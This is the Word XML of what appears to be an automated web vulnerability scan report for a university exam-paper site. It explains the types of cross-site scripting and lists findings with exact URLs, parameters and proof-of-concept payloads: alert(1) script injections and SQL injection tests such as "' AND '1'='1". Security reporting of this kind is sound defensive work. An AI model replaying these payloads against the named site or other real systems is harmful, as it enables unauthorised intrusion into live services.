              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8966" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1153" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="300" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="3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URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3797" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.dcrustedp.in/dcrustpqp3.php?examid=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E</w:t>
              </w:r>
            </w:hyperlink>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Method</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GET</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Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3797" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="001E33B8"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w:t>
            </w:r>
            <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>xamid</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Attack</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&lt;/h1&gt;&lt;script&gt;alert(1);&lt;/script&gt;&lt;h1&gt;</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Evidence</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&lt;/h1&gt;&lt;script&gt;alert(1);&lt;/script&gt;&lt;h1&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1111" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="300" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="3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URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3839" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.dcrustedp.in/docverify/docverify_reg_form.php</w:t>
              </w:r>
            </w:hyperlink>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lastRenderedPageBreak/>
              <w:t>Method</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POST</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Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3797" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="001E33B8"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F</w:t>
            </w:r>
            <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>name</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Attack</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&lt;/script&gt;&lt;script&gt;alert(1);&lt;/script&gt;&lt;script&gt;</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Evidence</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&lt;/script&gt;&lt;script&gt;alert(1);&lt;/script&gt;&lt;script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1153" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="300" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="3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URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3797" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.dcrustedp.in/dcrustpqp2.php?examid=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E</w:t>
              </w:r>
            </w:hyperlink>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Method</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GET</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Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3797" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="001E33B8"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w:t>
            </w:r>
            <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>xamid</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Attack</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&lt;script&gt;alert(1);&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1153" w:type="pct"/>
            <w:gridSpan w:val="2"/>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Evidence</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&lt;script&gt;alert(1);&lt;/script&gt;</w:t>
            </w:r>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Instances</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="3797" w:type="pct"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1153" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6"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Solution</w:t>
            </w:r>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Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3797" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>http://projects.webappsec.org/Cross-Site-Scripting</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>http://cwe.mitre.org/data/definitions/79.html</w:t>
              </w:r>
            </w:hyperlink>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CWE Id</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79</w:t>
            </w:r>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WASC Id</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8</w:t>
            </w:r>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Source ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3797"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1153" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3797" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pP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2544"/>
        <w:gridCol w:w="6482"/>
      </w:tblGrid>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:trHeight w:val="288"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>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High (Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>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b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="1"/>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389"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Description</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pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL injection may be possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4967" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="300" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="3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URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.dcrustedp.in/dcrustpqp2.php?examid=10-2</w:t>
              </w:r>
            </w:hyperlink>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Method</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GET</w:t>
            </w:r>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Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="001E33B8"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w:t>
            </w:r>
            <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>xamid</w:t>
            </w:r>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Attack</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10-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="300" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="3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URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId21" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.dcrustedp.in/dcrustpqp3.php?examid=27-Jan.+2021%27+AND+%271%27%3D%271</w:t>
              </w:r>
            </w:hyperlink>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lastRenderedPageBreak/>
              <w:t>Method</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GET</w:t>
            </w:r>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Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="001E33B8"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E</w:t>
            </w:r>
            <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>xamid</w:t>
            </w:r>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Attack</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27-Jan. 2021' AND '1'='1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="300" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="3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URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
